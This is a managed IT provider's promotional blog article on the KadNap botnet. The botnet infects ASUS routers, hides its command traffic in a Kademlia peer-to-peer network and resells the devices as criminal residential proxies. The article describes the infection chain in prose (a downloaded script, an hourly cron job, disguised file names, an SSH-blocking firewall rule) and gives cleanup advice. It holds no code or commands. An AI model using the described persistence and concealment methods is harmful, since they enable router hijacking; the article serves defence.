KadNap Malware Is Turning 14,000 ASUS Routers Into Criminal Proxy Networks

KadNap is a botnet malware first detected in August 2025 by Lumen's Black Lotus Labs. The name comes from its use of a custom version of the Kademlia Distributed Hash Table (DHT) protocol - a peer-to-peer system originally designed for legitimate file-sharing networks like BitTorrent. The attackers repurposed this protocol to hide their command-and-control infrastructure inside what looks like normal peer-to-peer traffic.

Here's why that matters. Traditional botnets use centralized command servers. Security teams find those servers, get a court order, and shut them down. Game over. KadNap doesn't work that way. Every infected device talks to other infected devices to find instructions. There's no single server to seize. If defenders block 10 nodes, the other 13,990 keep running.

Key characteristics of KadNap:

• 14,000+ infected devices averaging daily, up from 10,000 when first discovered in August 2025
• ASUS routers are the primary target, though other edge devices and IoT hardware are also affected
• Decentralized P2P architecture based on Kademlia DHT protocol makes traditional takedown methods ineffective
• No zero-day exploits required - the malware exploits known vulnerabilities that owners haven't patched
• Survives reboots through a persistent shell script that re-executes automatically on restart
• 60%+ of victims are in the United States, with additional infections in Taiwan, Hong Kong, Russia, the UK, and other countries

Black Lotus Labs researcher Chris Formosa told Ars Technica that the high concentration of ASUS hardware in the botnet likely comes down to the attackers having a reliable exploit for specific ASUS models. Not a sophisticated zero-day - just known bugs that never got patched.

KadNap succeeds because it targets the gap between "we have a router" and "someone is actively managing that router." That's the gap CinchOps fills for Houston-area businesses every day. In 30 years working in IT - including time at Cisco managing network infrastructure at enterprise scale - the pattern behind nearly every router compromise we respond to is the same: firmware that hasn't been updated in years, default credentials still in place, and no one watching the traffic.

CinchOps is a managed IT services provider based in Katy, Texas, serving small and mid-sized businesses across the Houston metro area. CinchOps specializes in cybersecurity, network security, managed IT support, VoIP, and SD-WAN for businesses with 10-200 employees.

Here's how we help protect businesses from threats like KadNap:

• Router and edge device firmware management - We maintain current firmware across all network devices, closing the exact vulnerabilities that KadNap exploits before attackers can reach them
• Network traffic monitoring - Active monitoring catches anomalous outbound connections, unusual peer-to-peer traffic patterns, and communication with known malicious infrastructure
• Hardware lifecycle management - We track which devices are approaching end-of-life and plan replacements before they become unpatachable security liabilities
• Network segmentation - Properly segmented networks limit the blast radius when any single device is compromised, preventing lateral movement across your business infrastructure
• Indicator of compromise (IoC) monitoring - We stay current with published threat intelligence feeds and actively check your environment against known malicious IPs, domains, and file hashes
• Incident response - If a device is compromised, we handle the full remediation: isolation, factory reset, firmware update, reconfiguration, and verification

The businesses that get hit by threats like KadNap are the ones where nobody is watching the router. Don't let your business be one of them. Contact CinchOps for a free security assessment across your Katy, Sugar Land, or greater Houston area business network.

The infection chain starts with a shell script called aic.sh downloaded from a command server. This script does the heavy lifting for initial compromise:

• Creates a cron job that retrieves the malicious script every hour at the 55-minute mark
• Renames the script to .asusrouter - a naming choice designed to blend in with legitimate ASUS processes
• Downloads and executes an ELF binary renamed "kad" - this is the KadNap malware itself
• Samples exist for both ARM and MIPS architectures, covering a wide range of consumer and edge hardware

Once the malware initializes, it takes several steps to embed itself in the network. KadNap checks the device's external IP address, synchronizes time with NTP servers, and then begins the process of joining the peer-to-peer network.

The Kademlia DHT Trick

This is where KadNap gets clever. In a standard Kademlia network, each node gets a unique ID within a 160-bit address space. Nodes store keys for nearby neighbors, and distance between nodes is measured using XOR calculations. When a node needs to find another, it queries neighbors, getting progressively closer with each hop.

KadNap adds a twist: it obtains its initial search key through a BitTorrent node. Black Lotus Labs researcher Chris Formosa described the process in plain terms - infected devices reach out to BitTorrent entry nodes with a secret passphrase, get directed to nearby "neighbors" who point them closer, and eventually arrive at a node that provides the actual command-and-control address. The C2 address is delivered along with a firewall rule file that blocks port 22 (SSH), locking out legitimate administrators.

There's a weakness in the implementation, though. Analysis of KadNap samples going back to August 2025 shows that infected devices consistently contact the same two intermediate nodes before reaching command servers. In a true Kademlia network, those final hops would change over time. This consistency gives defenders a potential detection point.

Infrastructure Segmentation

The botnet operators aren't running a flat network. They segment their infrastructure by device type and model. More than half the botnet - the ASUS victims - connects to two ASUS-specific command servers. The remaining infected devices communicate with two separate control servers. This segmentation makes attribution harder and helps the operators manage their criminal infrastructure more efficiently.

The numbers tell a clear story. Over 60% of KadNap infections are concentrated in the United States, with smaller clusters in Taiwan, Hong Kong, Russia, the UK, Australia, Brazil, France, Italy, and Spain. Any business running ASUS routers - or other edge networking and IoT devices - with outdated firmware is a potential target.

Businesses most at risk include:

• Small and mid-sized businesses using consumer-grade routers - SOHO (small office/home office) hardware is the primary target, and many Houston SMBs rely on equipment that's been running the same firmware for years
• Companies with remote workers - Home routers used by remote employees can serve as entry points, and those devices are almost never managed or updated by the company
• Businesses without active network monitoring - KadNap operates silently. Your internet might feel slightly slower, but there's no pop-up, no warning. Netflix still streams. You won't know unless someone is watching your network traffic
• Organizations using end-of-life hardware - Routers that no longer receive firmware updates from the manufacturer are permanently vulnerable

KadNap isn't just about building a botnet for the sake of it. The infected devices are monetized through a criminal proxy service called Doppelganger, operating at doppelganger[.]shop. This service sells access to hijacked routers as "residential proxies" in over 50 countries, advertising "100% anonymity."

Security researchers believe Doppelganger is a direct rebrand of Faceless, a notorious proxy service that previously ran on devices compromised by the TheMoon malware - which also targeted ASUS routers. Doppelganger appears to have launched in May or June 2025, roughly two months before KadNap infections first appeared in the wild.

What criminals use these proxies for:

• Distributed denial-of-service (DDoS) attacks - overwhelming target servers with traffic from thousands of residential IP addresses
• Credential stuffing campaigns - testing stolen username/password combinations against login pages while hiding behind clean residential IPs
• Brute-force attacks - systematically guessing passwords against targeted accounts
• Traffic anonymization - hiding the origin of malicious activity behind legitimate business and home connections

The residential IP angle is what makes this particularly dangerous. When malicious traffic comes from what looks like a normal home or small business internet connection in Katy or Sugar Land, security tools have a much harder time distinguishing it from legitimate traffic. Your router becomes an unwitting accomplice in someone else's cybercrime operation.

This is the part that trips people up. Rebooting your router does not remove KadNap. The malware stores a shell script that automatically re-executes when a compromised router restarts. Power cycling changes nothing. The device comes back online and immediately reconnects to the botnet.

Here's what's actually required to clean an infected device:

• Perform a full factory reset - not just a reboot, but a complete reset to factory defaults that wipes all stored scripts and configurations
• Update firmware immediately after reset - install all available patches from the manufacturer before reconnecting to the internet
• Set a strong administrative password - replace any default credentials with a complex password that hasn't been used elsewhere
• Disable remote management - turn off remote access to the router's admin interface unless you have a specific, documented need for it
• Check Black Lotus Labs' indicators of compromise - review your router logs for connections to known KadNap command-and-control IP addresses
• Replace end-of-life hardware - if your router no longer receives firmware updates from the manufacturer, no amount of patching will help. Replace it

Lumen has proactively blocked all network traffic to and from KadNap's control infrastructure within their own network. They're also distributing indicators of compromise through public feeds so other organizations can block access on their end. But if you're running a vulnerable, unpatched ASUS router on a non-Lumen connection, you're still exposed.

Prevention Going Forward

The best defense against threats like KadNap is the same defense that works against 90% of network threats: keep your firmware updated, replace hardware that's past its support lifecycle, and have someone actively monitoring your network traffic for anomalies. None of that happens by itself.